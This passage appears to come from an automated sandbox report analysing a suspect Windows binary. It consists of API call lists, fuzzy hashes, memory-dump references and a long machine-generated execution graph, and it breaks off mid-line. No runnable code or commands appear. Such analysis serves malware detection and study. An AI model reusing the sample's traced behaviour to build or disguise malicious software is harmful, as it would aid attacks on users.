                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014D7
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Alloc$Free
                                                                            • String ID: Y
                                                                            • API String ID: 3668210933-1754117475
                                                                            • Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                            • Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
                                                                            • Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                            • Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: )q@
                                                                            • API String ID: 3660427363-2284170586
                                                                            • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                            • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                            • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                            • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                            APIs
                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastSleep
                                                                            • String ID:
                                                                            • API String ID: 1458359878-0
                                                                            • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                            • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                            Execution Graph

                                                                            Execution Coverage:16%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:4.3%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:69
                                                                            execution_graph 49694 40cf00 49695 40cf12 49694->49695 49696 40cf0d 49694->49696 49698 406f50 CloseHandle 49696->49698 49698->49695 55841 4413a4 55842 4413ad 55841->55842 55843 4413bb WriteFile 55841->55843 55842->55843 55844 4413c6 55843->55844 49699 492208 49700 49223c 49699->49700 49701 49223e 49700->49701 49702 492252 49700->49702 49845 446fac 18 API calls 49701->49845 49705 492261 49702->49705 49707 49228e 49702->49707 49704 492247 Sleep 49719 492289 49704->49719 49835 447008 49705->49835 49711 4922ca 49707->49711 49712 49229d 49707->49712 49709 492270 49713 492278 FindWindowA 49709->49713 49717 4922d9 49711->49717 49718 492320 49711->49718 49714 447008 18 API calls 49712->49714 49839 447288 49713->49839 49716 4922aa 49714->49716 49721 4922b2 FindWindowA 49716->49721 49846 446fac 18 API calls 49717->49846 49724 49237c 49718->49724 49725 49232f 49718->49725 49885 403420 49719->49885 49723 447288 5 API calls 49721->49723 49722 4922e5 49847 446fac 18 API calls 49722->49847 49727 4922c5 49723->49727 49734 4923d8 49724->49734 49735 49238b 49724->49735 49850 446fac 18 API calls 49725->49850 49727->49719 49729 4922f2 49848 446fac 18 API calls 49729->49848 49730 49233b 49851 446fac 18 API calls 49730->49851 49733 4922ff 49849 446fac 18 API calls 49733->49849 49745 492412 49734->49745 49746 4923e7 49734->49746 49855 446fac 18 API calls 49735->49855 49737 492348 49852 446fac 18 API calls 49737->49852 49739 492397 49856 446fac 18 API calls 49739->49856 49741 49230a SendMessageA 49744 447288 5 API calls 49741->49744 49743 492355 49853 446fac 18 API calls 49743->49853 49744->49727 49754 492421 49745->49754 49755 492460 49745->49755 49749 447008 18 API calls 49746->49749 49747 4923a4 49857 446fac 18 API calls 49747->49857 49752 4923f4 49749->49752 49751 492360 PostMessageA 49854 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49751->49854 49757 4923fc RegisterClipboardFormatA 49752->49757 49753 4923b1 49858 446fac 18 API calls 49753->49858 49860 446fac 18 API calls 49754->49860 49763 49246f 49755->49763 49764 4924b4 49755->49764 49760 447288 5 API calls 49757->49760 49760->49719 49761 4923bc SendNotifyMessageA 49859 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49761->49859 49762 49242d 49861 446fac 18 API calls 49762->49861 49863 446fac 18 API calls 49763->49863 49773 492508 49764->49773 49774 4924c3 49764->49774 49768 49243a 49862 446fac 18 API calls 49768->49862 49769 49247b 49864 446fac 18 API calls 49769->49864 49772 492445 SendMessageA 49777 447288 5 API calls 49772->49777 49782 49256a 49773->49782 49783 492517 49773->49783 49867 446fac 18 API calls 49774->49867 49776 492488 49865 446fac 18 API calls 49776->49865 49777->49727 49778 4924cf 49868 446fac 18 API calls 49778->49868 49781 492493 PostMessageA 49866 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49781->49866 49790 492579 49782->49790 49791 4925f1 49782->49791 49786 447008 18 API calls 49783->49786 49784 4924dc 49869 446fac 18 API calls 49784->49869 49788 492524 49786->49788 49871 42e3a4 SetErrorMode 49788->49871 49789 4924e7 SendNotifyMessageA 49870 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49789->49870 49794 447008 18 API calls 49790->49794 49800 492600 49791->49800 49801 492626 49791->49801 49798 492588 49794->49798 49795 492531 49796 492547 GetLastError 49795->49796 49797 492537 49795->49797 49802 447288 5 API calls 49796->49802 49799 447288 5 API calls 49797->49799 49874 446fac 18 API calls 49798->49874 49803 492545 49799->49803 49879 446fac 18 API calls 49800->49879 49810 492658 49801->49810 49811 492635 49801->49811 49802->49803 49807 447288 5 API calls 49803->49807 49806 49260a FreeLibrary 49880 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49806->49880 49807->49719 49808 49259b GetProcAddress 49812 4925e1 49808->49812 49813 4925a7 49808->49813 49818 492667 49810->49818 49824 49269b 49810->49824 49814 447008 18 API calls 49811->49814 49878 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49812->49878 49875 446fac 18 API calls 49813->49875 49816 492641 49814->49816 49822 492649 CreateMutexA 49816->49822 49881 48c638 18 API calls 49818->49881 49819 4925b3 49876 446fac 18 API calls 49819->49876 49822->49719 49823 4925c0 49827 447288 5 API calls 49823->49827 49824->49719 49883 48c638 18 API calls 49824->49883 49826 492673 49828 492684 OemToCharBuffA 49826->49828 49829 4925d1 49827->49829 49882 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49828->49882 49877 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49829->49877 49832 4926b6 49833 4926c7 CharToOemBuffA 49832->49833 49884 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49833->49884 49836 447010 49835->49836 49889 436088 49836->49889 49838 44702f 49838->49709 49840 447290 49839->49840 49943 4363f0 VariantClear 49840->49943 49842 4472b3 49843 4472ca 49842->49843 49944 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49842->49944 49843->49719 49845->49704 49846->49722 49847->49729 49848->49733 49849->49741 49850->49730 49851->49737 49852->49743 49853->49751 49854->49727 49855->49739 49856->49747 49857->49753 49858->49761 49859->49719 49860->49762 49861->49768 49862->49772 49863->49769 49864->49776 49865->49781 49866->49727 49867->49778 49868->49784 49869->49789 49870->49719 49945 403738 49871->49945 49874->49808 49875->49819 49876->49823 49877->49727 49878->49727 49879->49806 49880->49719 49881->49826 49882->49719 49883->49832 49884->49719 49887 403426 49885->49887 49886 40344b 49887->49886 49888 402660 4 API calls 49887->49888 49888->49887 49890 436094 49889->49890 49906 4360b6 49889->49906 49890->49906 49909 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49890->49909 49891 436139 49918 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49891->49918 49893 436121 49913 403494 49893->49913 49894 436109 49898 403510 4 API calls 49894->49898 49895 4360fd 49910 403510 49895->49910 49896 43612d 49917 4040e8 18 API calls 49896->49917 49903 436112 49898->49903 49902 43614a 49902->49838 49903->49838 49904 436115 49904->49838 49906->49891 49906->49893 49906->49894 49906->49895 49906->49896 49906->49904 49907 436136 49907->49838 49909->49906 49919 4034e0 49910->49919 49915 403498 49913->49915 49914 4034ba 49914->49838 49915->49914 49916 402660 4 API calls 49915->49916 49916->49914 49917->49907 49918->49902 49924 4034bc 49919->49924 49922 4034f0 49929 403400 49922->49929 49925 4034c0 49924->49925 49926 4034dc 49924->49926 49933 402648 49925->49933 49926->49922 49928 4034c9 49928->49922 49930 403406 49929->49930 49931 40341f 49929->49931 49930->49931 49938 402660 49930->49938 49931->49838 49934 40264c 49933->49934 49935 402656 49933->49935 49934->49935 49937 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49934->49937 49935->49928 49935->49935 49937->49935 49939 402664 49938->49939 49941 40266e 49938->49941 49939->49941 49942 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49939->49942 49941->49931 49942->49941 49943->49842 49944->49843 49946 40373c LoadLibraryA 49945->49946 49946->49795 49947 402584 49948 402598 49947->49948 49949 4025ab 49947->49949 49977 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49948->49977 49950 4025c2 RtlEnterCriticalSection 49949->49950 49951 4025cc 49949->49951 49950->49951 49963 4023b4 13 API calls 49951->49963 49953 40259d 49953->49949 49955 4025a1 49953->49955 49956 4025d9 49959 402635 49956->49959 49960 40262b RtlLeaveCriticalSection 49956->49960 49957 4025d5 49957->49956 49964 402088 49957->49964 49960->49959 49961 4025e5 49961->49956 49978 402210 9 API calls 49961->49978 49963->49957 49965 40209c 49964->49965 49966 4020af 49964->49966 49985 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49965->49985 49968 4020c6 RtlEnterCriticalSection 49966->49968 49971 4020d0 49966->49971 49968->49971 49969 4020a1 49969->49966 49970 4020a5 49969->49970 49974 402106 49970->49974 49971->49974 49979 401f94 49971->49979 49974->49961 49975 4021f1 RtlLeaveCriticalSection 49976 4021fb 49975->49976 49976->49961 49977->49953 49978->49956 49980 401fa4 49979->49980 49981 401fd0 49980->49981 49984 401ff4 49980->49984 49986 401f0c 49980->49986 49981->49984 49991 401db4 49981->49991 49984->49975 49984->49976 49985->49969 49995 40178c 49986->49995 49989 401f29 49989->49980 49992 401dd2 49991->49992 49993 401e02 49991->49993 49992->49984 49993->49992 50018 401d1c 49993->50018 49998 4017a8 49995->49998 49997 4017b2 50014 401678 VirtualAlloc 49997->50014 49998->49997 50000 40180f 49998->50000 50002 401803 49998->50002 50006 4014e4 49998->50006 50015 4013e0 LocalAlloc 49998->50015 50000->49989 50005 401e80 9 API calls 50000->50005 50016 4015c0 VirtualFree 50002->50016 50003 4017be 50003->50000 50005->49989 50007 4014f3 VirtualAlloc 50006->50007 50009 401520 50007->50009 50010 401543 50007->50010 50017 401398 LocalAlloc 50009->50017 50010->49998 50012 40152c 50012->50010 50013 401530 VirtualFree 50012->50013 50013->50010 50014->50003 50015->49998 50016->50000 50017->50012 50019 401d2e 50018->50019 50020 401d51 50019->50020 50021 401d63 50019->50021 50031 401940 50020->50031 50023 401940 3 API calls 50021->50023 50024 401d61 50023->50024 50025 401d79 50024->50025 50041 401bf8 9 API calls 50024->50041 50025->49992 50027 401d88 50028 401da2 50027->50028 50042 401c4c 9 API calls 50027->50042 50043 401454 LocalAlloc 50028->50043 50032 401966 50031->50032 50040 4019bf 50031->50040 50044 40170c 50032->50044 50036 401983 50038 40199a 50036->50038 50049 4015c0 VirtualFree 50036->50049 50038->50040 50050 401454 LocalAlloc 50038->50050 50040->50024 50041->50027 50042->50028 50043->50025 50045 401743 50044->50045 50046 401783 50045->50046 50047 40175d VirtualFree 50045->50047 50048 4013e0 LocalAlloc 50046->50048 50047->50045 50048->50036 50049->50038 50050->50040 55845 48042c 55850 450ff0 55845->55850 55847 480440 55860 47f518 55847->55860 55849 480464 55851 450ffd 55850->55851 55853 451051 55851->55853 55866 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55851->55866 55854 450e74 InterlockedExchange 55853->55854 55855 451063 55854->55855 55857 451079 55855->55857 55867 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55855->55867 55858 4510bc 55857->55858 55868 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55857->55868 55858->55847 55869 40b5c8 55860->55869 55862 47f53a 55863 47f585 55862->55863 55864 4069e4 4 API calls 55862->55864 55873 4768b0 55862->55873 55863->55849 55864->55862 55866->55853 55867->55857 55868->55858 55871 40b5d3 55869->55871 55870 40b5f3 55870->55862 55871->55870 55889 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55871->55889 55881 4768e1 55873->55881 55883 47692a 55873->55883 55874 476975 55890 451280 55874->55890 55876 451280 21 API calls 55876->55883 55877 4038a4 4 API calls 55877->55881 55878 47698c 55879 403420 4 API calls 55878->55879 55882 4769a6 55879->55882 55880 4038a4 4 API calls 55880->55883 55881->55877 55881->55883 55884 403744 4 API calls 55881->55884 55885 403450 4 API calls 55881->55885 55888 451280 21 API calls 55881->55888 55882->55862 55883->55874 55883->55876 55883->55880 55886 403744 4 API calls 55883->55886 55887 403450 4 API calls 55883->55887 55884->55881 55885->55881 55886->55883 55887->55883 55888->55881 55889->55870 55891 45129b 55890->55891 55895 451290 55890->55895 55896 451224 21 API calls 55891->55896 55893 4512a6 55893->55895 55897 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55893->55897 55895->55878 55896->55893 55897->55895 55898 41ee64 55899 41ee73 IsWindowVisible 55898->55899 55900 41eea9 55898->55900 55899->55900 55901 41ee7d IsWindowEnabled 55899->55901 55901->55900 55902 41ee87 55901->55902 55903 402648 4 API calls 55902->55903 55904 41ee91 EnableWindow 55903->55904 55904->55900 55905 41fb68 55906 41fb71 55905->55906 55909 41fe0c 55906->55909 55908 41fb7e 55910 41fefe 55909->55910 55911 41fe23 55909->55911 55910->55908 55911->55910 55930 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55911->55930 55913 41fe59 55914 41fe83 55913->55914 55915 41fe5d 55913->55915 55940 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55914->55940 55931 41fbac 55915->55931 55918 41fe91 55920 41fe95 55918->55920 55921 41febb 55918->55921 55924 41fbac 10 API calls 55920->55924 55925 41fbac 10 API calls 55921->55925 55922 41fbac 10 API calls 55923 41fe81 55922->55923 55923->55908 55926 41fea7 55924->55926 55927 41fecd 55925->55927 55928 41fbac 10 API calls 55926->55928 55929 41fbac 10 API calls 55927->55929 55928->55923 55929->55923 55930->55913 55932 41fbc7 55931->55932 55933 41fbdd 55932->55933 55934 41f94c 4 API calls 55932->55934 55941 41f94c 55933->55941 55934->55933 55936 41fc25 55937 41fc48 SetScrollInfo 55936->55937 55949 41faac 55937->55949 55940->55918 55942 4181f0 55941->55942 55943 41f969 GetWindowLongA 55942->55943 55944 41f9a6 55943->55944 55945 41f986 55943->55945 55961 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55944->55961 55960 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55945->55960 55948 41f992 55948->55936 55950 41faba 55949->55950 55951 41fac2 55949->55951 55950->55922 55952 41fb01 55951->55952 55953 41faf1 55951->55953 55959 41faff 55951->55959 55963 417e58 IsWindowVisible ScrollWindow SetWindowPos 55952->55963 55962 417e58 IsWindowVisible ScrollWindow SetWindowPos 55953->55962 55954 41fb41 GetScrollPos 55954->55950 55957 41fb4c 55954->55957 55958 41fb5b SetScrollPos 55957->55958 55958->55950 55959->55954 55960->55948 55961->55948 55962->55959 55963->55959 55964 4205a8 55965 4205bb 55964->55965 55985 415b40 55965->55985 55967 420702 55968 420719 55967->55968 55992 4146e4 KiUserCallbackDispatcher 55967->55992 55972 420730 55968->55972 55993 414728 KiUserCallbackDispatcher 55968->55993 55969 420661 55990 420858 20 API calls 55969->55990 55970 4205f6 55970->55967 55970->55969 55978 420652 MulDiv 55970->55978 55975 420752 55972->55975 55994 420070 12 API calls 55972->55994 55976 42067a 55976->55967 55991 420070 12 API calls 55976->55991 55989 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 55978->55989 55981 420697 55982 4206b3 MulDiv 55981->55982 55983 4206d6 55981->55983 55982->55983 55983->55967 55984 4206df MulDiv 55983->55984 55984->55967 55986 415b52 55985->55986 55995 414480 55986->55995 55988 415b6a 55988->55970 55989->55969 55990->55976 55991->55981 55992->55968 55993->55972 55994->55975 55996 41449a 55995->55996 55999 410658 55996->55999 55998 4144b0 55998->55988 56002 40dea4 55999->56002 56001 41065e 56001->55998 56003 40df06 56002->56003 56004 40deb7 56002->56004 56009 40df14 56003->56009 56007 40df14 19 API calls 56004->56007 56008 40dee1 56007->56008 56008->56001 56010 40df24 56009->56010 56012 40df3a 56010->56012 56021 40e29c 56010->56021 56037 40d7e0 56010->56037 56040 40e14c 56012->56040 56015 40d7e0 5 API calls 56016 40df42 56015->56016 56016->56015 56017 40dfae 56016->56017 56043 40dd60 56016->56043 56018 40e14c 5 API calls 56017->56018 56020 40df10 56018->56020 56020->56001 56057 40eb6c 56021->56057 56023 403778 4 API calls 56025 40e2d7 56023->56025 56024 40e38d 56026 40e3b7 56024->56026 56027 40e3a8 56024->56027 56025->56023 56025->56024 56120 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56120 56121 40e280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56121 56117 40bc24 56026->56117 56066 40e5c0 56027->56066 56032 40e3b5 56034 403400 4 API calls 56032->56034 56035 40e45c 56034->56035 56035->56010 56038 40ec08 5 API calls 56037->56038 56039 40d7ea 56038->56039 56039->56010 56154 40d6bc 56040->56154 56163 40e154 56043->56163 56046 40eb6c 5 API calls 56047 40dd9e 56046->56047 56048 40eb6c 5 API calls 56047->56048 56049 40dda9 56048->56049 56050 40ddc4 56049->56050 56051 40ddbb 56049->56051 56056 40ddc1 56049->56056 56170 40dbd8 56050->56170 56173 40dcc8 19 API calls 56051->56173 56054 403420 4 API calls 56055 40de8f 56054->56055 56055->56016 56056->56054 56123 40d980 56057->56123 56060 4034e0 4 API calls 56061 40eb8f 56060->56061 56062 403744 4 API calls 56061->56062 56063 40eb96 56062->56063 56064 40d980 5 API calls 56063->56064 56065 40eba4 56064->56065 56065->56025 56067 40e5f6 56066->56067 56068 40e5ec 56066->56068 56070 40e711 56067->56070 56071 40e695 56067->56071 56072 40e6f6 56067->56072 56073 40e776 56067->56073 56074 40e638 56067->56074 56075 40e6d9 56067->56075 56076 40e67a 56067->56076 56077 40e6bb 56067->56077 56110 40e65c 56067->56110 56128 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56068->56128 56078 40d964 5 API calls 56070->56078 56136 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56071->56136 56141 40ea90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56072->56141 56082 40d964 5 API calls 56073->56082 56129 40d964 56074->56129 56139 40eba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56075->56139 56135 40da18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56076->56135 56138 40dfe4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56077->56138 56087 40e719 56078->56087 56081 403400 4 API calls 56088 40e7eb 56081->56088 56089 40e77e 56082->56089 56093 40e723 56087->56093 56094 40e71d 56087->56094 56088->56032 56095 40e782 56089->56095 56096 40e79b 56089->56096 56090 40e6e4 56140 409f38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56090->56140 56092 40e6a0 56137 40d670 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56092->56137 56142 40ec08 56093->56142 56102 40e721 56094->56102 56103 40e73c 56094->56103 56105 40ec08 5 API calls 56095->56105 56148 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56096->56148 56098 40e661 56134 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56098->56134 56099 40e644 56132 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56099->56132 56146 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56102->56146 56108 40ec08 5 API calls 56103->56108 56105->56110 56112 40e744 56108->56112 56109 40e64f 56133 40e46c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56109->56133 56110->56081 56145 40daa0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56112->56145 56114 40e766 56147 40e4d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56114->56147 56149 40bbd0 56117->56149 56120->56025 56121->56025 56122 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56122->56032 56124 40d98b 56123->56124 56125 40d9c5 56124->56125 56127 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56124->56127 56125->56060 56127->56124 56128->56067 56130 40ec08 5 API calls 56129->56130 56131 40d96e 56130->56131 56131->56098 56131->56099 56132->56109 56133->56110 56134->56110 56135->56110 56136->56092 56137->56110 56138->56110 56139->56090 56140->56110 56141->56110 56143 40d980 5 API calls 56142->56143 56144 40ec15 56143->56144 56144->56110 56145->56110 56146->56114 56147->56110 56148->56110 56150 40bbe2 56149->56150 56152 40bc07 56149->56152 56150->56152 56153 40bc84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56150->56153 56152->56032 56152->56122 56153->56152 56155 40ec08 5 API calls 56154->56155 56156 40d6c9 56155->56156 56157 40d6dc 56156->56157 56161 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56156->56161 56157->56016 56159 40d6d7 56162 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56159->56162 56161->56159 56162->56157 56164 40d964 5 API calls 56163->56164 56165 40e16b 56164->56165 56166 40ec08 5 API calls 56165->56166 56169 40dd93 56165->56169 56167 40e178 56166->56167 56167->56169 56174 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56167->56174 56169->56046 56175 40ad7c 19 API calls 56170->56175 56172 40dc00 56172->56056 56173->56056 56174->56169 56175->56172 50051 491444 50052 49147e 50051->50052 50053 49148a 50052->50053 50054 491480 50052->50054 50056 491499 50053->50056 50057 4914c2 50053->50057 50247 4090a0 MessageBeep 50054->50247 50059 447008 18 API calls 50056->50059 50062 4914fa 50057->50062 50063 4914d1 50057->50063 50058 403420 4 API calls 50060 491ad6 50058->50060 50061 4914a6 50059->50061 50064 403400 4 API calls 50060->50064 50248 406bb8 50061->50248 50072 491509 50062->50072 50073 491532 50062->50073 50066 447008 18 API calls 50063->50066 50067 491ade 50064->50067 50069 4914de 50066->50069 50256 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50069->50256 50075 447008 18 API calls 50072->50075 50078 49155a 50073->50078 50079 491541 50073->50079 50074 4914e9 50257 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50074->50257 50077 491516 50075->50077 50258 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50077->50258 50086 491569 50078->50086 50087 49158e 50078->50087 50260 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 50079->50260 50082 491521 50259 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50082->50259 50083 491549 50261 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50083->50261 50088 447008 18 API calls 50086->50088 50090 49159d 50087->50090 50094 4915c6 50087->50094 50089 491576 50088->50089 50262 4072b0 50089->50262 50093 447008 18 API calls 50090->50093 50092 49157e 50265 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50092->50265 50096 4915aa 50093->50096 50097 4915fe 50094->50097 50098 4915d5 50094->50098 50266 42c814 50096->50266 50106 49164a 50097->50106 50107 49160d 50097->50107 50101 447008 18 API calls 50098->50101 50099 491485 50099->50058 50103 4915e2 50101->50103 50276 407200 8 API calls 50103->50276 50112 491659 50106->50112 50113 491682 50106->50113 50109 447008 18 API calls 50107->50109 50108 4915ed 50277 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50108->50277 50111 49161c 50109->50111 50114 447008 18 API calls 50111->50114 50115 447008 18 API calls 50112->50115 50119 4916ba 50113->50119 50120 491691 50113->50120 50116 49162d 50114->50116 50117 491666 50115->50117 50278 491148 8 API calls 50116->50278 50280 42c8b4 50117->50280 50129 4916c9 50119->50129 50130 4916f2 50119->50130 50123 447008 18 API calls 50120->50123 50121 491639 50279 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50121->50279 50126 49169e 50123->50126 50286 42c8dc 50126->50286 50132 447008 18 API calls 50129->50132 50135 49172a 50130->50135 50136 491701 50130->50136 50134 4916d6 50132->50134 50295 42c90c LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50134->50295 50143 491739 50135->50143 50144 491762 50135->50144 50138 447008 18 API calls 50136->50138 50140 49170e 50138->50140 50139 4916e1 50296 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50139->50296 50297 42c93c 50140->50297 50146 447008 18 API calls 50143->50146 50150 4917ae 50144->50150 50151 491771 50144->50151 50147 491746 50146->50147 50303 42c964 50147->50303 50156 4917bd 50150->50156 50157 491800 50150->50157 50153 447008 18 API calls 50151->50153 50155 491780 50153->50155 50158 447008 18 API calls 50155->50158 50159 447008 18 API calls 50156->50159 50163 49180f 50157->50163 50164 491873 50157->50164 50160 491791 50158->50160 50161 4917d0 50159->50161 50309 42c508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50160->50309 50165 447008 18 API calls 50161->50165 50167 447008 18 API calls 50163->50167 50172 4918b2 50164->50172 50173 491882 50164->50173 50168 4917e1 50165->50168 50166 49179d 50310 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50166->50310 50170 49181c 50167->50170 50311 491340 12 API calls 50168->50311 50239 42c618 7 API calls 50170->50239 50184 4918f1 50172->50184 50185 4918c1 50172->50185 50176 447008 18 API calls 50173->50176 50175 4917ef 50312 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50175->50312 50179 